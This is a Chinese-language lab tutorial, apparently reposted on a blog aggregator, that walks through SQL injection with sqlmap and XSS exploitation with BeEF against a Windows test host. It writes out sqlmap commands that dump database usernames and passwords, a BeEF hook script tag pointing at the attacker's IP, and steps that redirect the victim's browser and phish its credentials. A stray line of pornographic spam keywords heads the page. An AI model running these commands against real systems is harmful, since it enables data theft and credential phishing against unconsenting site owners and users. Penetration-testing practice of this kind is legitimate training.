国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

網(wǎng)絡安全:Kali Linux 進行SQL注入與XSS漏洞利用

這篇具有很好參考價值的文章主要介紹了網(wǎng)絡安全:Kali Linux 進行SQL注入與XSS漏洞利用。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

目錄

一、實驗

1.環(huán)境

2.Kali Linux 進行SQL注入

3.Kali Linux 進行XSS漏洞利用

二、問題

1.XSS分類

2.如何修改beef-xss的密碼

3.beef-xss 服務如何管理

4.運行beef報錯

5.beef 命令的顏色有哪些區(qū)別

6.owasp-top-10 有哪些變化


一、實驗

1.環(huán)境

(1)主機

表1? 主機

系統(tǒng) 版本 IP 備注
Kali Linux 2022.4

192.168.204.154(動態(tài))

Windows 10 192.168.204.10 Kali(2022.4)的目標主機

(2)查看Kali Linux (2022.4)系統(tǒng)版本

cat /etc/os-release

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(3)?查看Kali Linux (2022.4)系統(tǒng)IP地址

ip addr | grep 154

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(4)Windows 查看IP地址

ipconfig

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(5)Kali主機 ping?Windows主機

ping  192.168.204.10

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

2.Kali Linux 進行SQL注入

(1) LAMP(LNMP)平臺

選擇Windows版本

https://www.xp.cn/download.html

(2)sqlmap查閱

https://github.com/sqlmapproject/sqlmap

(3)獲取服務器信息

包括操作系統(tǒng)、數(shù)據(jù)庫、 web 容器、后端語?

sqlmap -u http://192.168.204.10/news/list.php?id=46

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(4)獲取數(shù)據(jù)名稱列表

--thread 10? 線程數(shù)設置為10

sqlmap -u http://192.168.204.10/news/show.php?id=46 --thread 10 -dbs

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(5)獲取當前數(shù)據(jù)庫名稱

sqlmap -u http://192.168.204.10/news/show.php?id=46 --current-db

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(6)獲取當前數(shù)據(jù)庫中所有表的名稱

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news --tables

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(7)獲取當前數(shù)據(jù)庫指定的表的字段名

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users --columns

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(8)獲取指定庫指定表指定字段的值

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users -C username,password --dump

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

3.Kali Linux 進行XSS漏洞利用

(1)漏洞測試平臺

選擇Windows版本

https://github.com/zhuifengshaonianhanlu/pikachu

(2)kali 系統(tǒng)更新

sudo apt-get update

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(3)安裝ruby

apt-get install ruby

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(4)安裝beef

apt-get install beef-xss 

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(5)啟動beef-xss

┌──(root?kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

┌──(root?kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
     Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago
   Main PID: 26104 (ruby)
      Tasks: 4 (limit: 2248)
     Memory: 92.8M
        CPU: 3.246s
     CGroup: /system.slice/beef-xss.service
             └─26104 ruby /usr/share/beef-xss/beef

3月 27 10:57:34 kali beef[26104]: == 24 CreateAutoloader: migrated (0.0013s) ====================================
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrating ============================================
3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans)
3月 27 10:57:34 kali beef[26104]:    -> 0.0016s
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrated (0.0016s) ===================================
3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds...
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(6)瀏覽器登錄

http://127.0.0.1:3000/ui/authentication

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(7) 輸入賬號密碼

賬號輸?beef,密碼輸?123456

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

進入系統(tǒng)

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(8) Windows 主機設置鉤子

 <script src="http://192.168.204.154:3000/hook.js"></script>

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(9)beef獲取目標主機

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(10)查看模塊

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(11)選擇重定向

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

執(zhí)行 (選擇Execute)

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(12) Windows 主機頁面重定向

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(13)選擇pretty theft

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

?執(zhí)行 (選擇Execute)

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(14)Windows主機彈出登錄界面

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(15)beef獲取賬號及密碼

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

二、問題

1.XSS分類

(1)類別

1)反射型XSS

2)持久型XSS
 
3)DOM型XSS

2.如何修改beef-xss的密碼

(1)修改

vim /etc/beef-xss/config.yaml

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(第7、8?)

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

3.beef-xss 服務如何管理

(1)開啟服務

1)第一種方式
任意目錄,直接輸入命令:beef-xss 打開 ,過5秒左右,然后它自動會打開命令行和瀏覽器beef的登錄框

2)第二種方式
進入/usr/share/beef-xss/,輸入命令:./beef-xss 打開 ,然后手動打開瀏覽器鏈接

(2)服務管理

1)開啟beef服務
systemctl start beef-xss.service      

2)關閉beef服務
systemctl stop beef-xss.service        

3)重啟beef服務
systemctl restart beef-xss.service  

4.運行beef報錯

(1)報錯

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

(2)原因分析

需要管理員操作。

(3)解決方法

切換為管理員操作。

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

5.beef 命令的顏色有哪些區(qū)別

(1)區(qū)別

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全

1)綠?
命令模塊可以在?標瀏覽器上運?,且?戶不會感到任何異常

2)灰?
命令模塊尚未針對???此?標進?驗證,不知道是否可運?

3)橙?
命令模塊可以在?標瀏覽器上運?,但是?戶可能會感到異常(例如彈窗、提示、跳轉等)

4)紅?
命令模塊不適?于此?標

6.owasp-top-10 有哪些變化

(1)官網(wǎng)

http://www.owasp.org.cn/OWASP-CHINA/owasp-project/2021-owasp-top-10/

(2)變化

最近2次的變化

linux sql漏洞,網(wǎng)絡安全,web安全,linux,xss,運維,安全文章來源地址http://www.zghlxwxcb.cn/news/detail-858541.html

到了這里,關于網(wǎng)絡安全:Kali Linux 進行SQL注入與XSS漏洞利用的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 【網(wǎng)絡安全】SQL注入詳解

    【網(wǎng)絡安全】SQL注入詳解

    SQL注入是比較常見的網(wǎng)絡攻擊方式之一,它不是利用操作系統(tǒng)的BUG來實現(xiàn)攻擊,而是針對程序員編寫時的疏忽,通過SQL語句,實現(xiàn)無賬號登錄,甚至篡改數(shù)據(jù)庫。 1:尋找到SQL注入的位置 2:判斷服務器類型和后臺數(shù)據(jù)庫類型 3:針對不同的服務器和數(shù)據(jù)庫特點進行SQL注入攻擊

    2024年02月06日
    瀏覽(23)
  • 【網(wǎng)絡安全】初探SQL注入漏洞

    【網(wǎng)絡安全】初探SQL注入漏洞

    要想玩SQL注入,一個簡單的數(shù)據(jù)交互頁面是需要的,故我們用PHP做一個簡易網(wǎng)頁,有登錄、注冊和首頁三塊內容。 登錄需要輸入賬號密碼,等待提交后進入系統(tǒng); 注冊需要輸入名字,密碼,手機號,照片,等待提交后進入系統(tǒng); 首頁需要利用PHP和數(shù)據(jù)庫聯(lián)動后的查詢語句,

    2024年02月16日
    瀏覽(23)
  • 網(wǎng)絡安全必學SQL注入

    網(wǎng)絡安全必學SQL注入

    SQL注入漏洞可以說是在企業(yè)運營中會遇到的最具破壞性的漏洞之一,它也是目前被利用得最多的漏洞。要學會如何防御SQL注入,首先我們要學習它的原理。 針對SQL注入的攻擊行為可描述為通過在用戶可控參數(shù)中注入SQL語法,破壞原有SQL結構,達到編寫程序時意料之外結果的攻

    2024年02月03日
    瀏覽(25)
  • 網(wǎng)絡安全-初學SQL注入&基本概念

    SQL語句:解釋SQL(Structured Query Language)是一種用于與關系型數(shù)據(jù)庫進行交互的語言。SQL語句用于執(zhí)行各種數(shù)據(jù)庫操作,例如插入、更新、刪除和查詢數(shù)據(jù)。 用戶輸入與SQL查詢的拼接:說明應用程序通常會接受用戶的輸入,并將其用作構建SQL查詢語句的一部分。這種拼接用戶

    2024年02月13日
    瀏覽(27)
  • 「網(wǎng)絡安全」SQL注入攻擊的真相

    「網(wǎng)絡安全」SQL注入攻擊的真相

    點擊此處即可獲得282G網(wǎng)絡安全學習資料 我們生活在數(shù)據(jù)的黃金時代。有些公司將其分析為更好的自己,有些公司為了獲利而進行交易,沒有一家公司因其價值而自由放棄 - 對于他們的業(yè)務和犯罪分子。 SQL(結構化查詢語言)是一種非常流行的與數(shù)據(jù)庫通信的方式。雖然許多

    2024年02月07日
    瀏覽(25)
  • 網(wǎng)絡安全之SQL注入及防御(下篇)

    網(wǎng)絡安全之SQL注入及防御(下篇)

    目錄 什么是SQL注入? 一,SQL注入會導致什么呢? 二,SQL注入思想與步驟 三,SQL注入的繞過 四,sqlmap工具的使用 ?五,sql注入的防御方法 總結 什么是SQL注入? SQL注入(SQL Injection)是一種常見的網(wǎng)絡攻擊手段,是因為應用程序對用戶輸入的數(shù)據(jù)驗證不到位造成的。攻擊者在

    2024年04月28日
    瀏覽(28)
  • 【網(wǎng)絡安全】SQL注入漏洞的修復建議

    【網(wǎng)絡安全】SQL注入漏洞的修復建議

    SQL注入是Web應用程序常見的安全漏洞之一,攻擊者通過惡意構造的SQL查詢語句,成功在應用程序的數(shù)據(jù)庫中執(zhí)行任意操作,導致數(shù)據(jù)泄露、篡改或其他安全問題。 本篇技術博客將詳細介紹SQL注入漏洞的修復建議,包括過濾危險字符和使用預編譯語句,通過具體的代碼案例幫助

    2024年02月06日
    瀏覽(26)
  • 網(wǎng)絡安全B模塊(筆記詳解)- SQL注入

    網(wǎng)絡安全B模塊(筆記詳解)- SQL注入

    1.使用滲透機場景kali中工具掃描服務器場景,將apache的端口號和版本號作為Flag提交(格式:端口號_版本號) ?Flag:8081_7.5 2.使用滲透機場景windows7訪問服務器場景SQL網(wǎng)站,并將網(wǎng)站中概述頁面中的Flag提交; Flag:sql_is_good 3.使用滲透機場景windows7訪問服務器中的SQL網(wǎng)站中的數(shù)

    2024年01月20日
    瀏覽(48)
  • 網(wǎng)絡安全進階學習第九課——SQL注入介紹

    網(wǎng)絡安全進階學習第九課——SQL注入介紹

    將 不受信任 的數(shù)據(jù)作為命令或查詢的一部分發(fā)送到解析器時,會產(chǎn)生諸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻擊者的惡意數(shù)據(jù)可以誘使解析器在 沒有適當授權 的情況下執(zhí)行非預期命令或訪問數(shù)據(jù)。 注入能導致 數(shù)據(jù)丟失、破壞 或 泄露給無授權方 ,缺乏可審

    2024年02月14日
    瀏覽(27)
  • SQL注入 ? ~~~ 網(wǎng)絡空間安全及計算機領域常見英語單詞及短語——網(wǎng)絡安全(二)

    就比如登錄頁面,輸入用戶名admin和密碼123456,網(wǎng)頁告訴服務器我的用戶名和密碼,服務器就會去問數(shù)據(jù)庫,有沒有這個用戶名admin并且密碼為123456的用戶,服務器收到數(shù)據(jù)庫的回答就回去告訴網(wǎng)頁,有這個用戶就登錄成功,沒有就登錄失敗。SQL注入就是在網(wǎng)頁告訴服務器我的

    2024年02月13日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包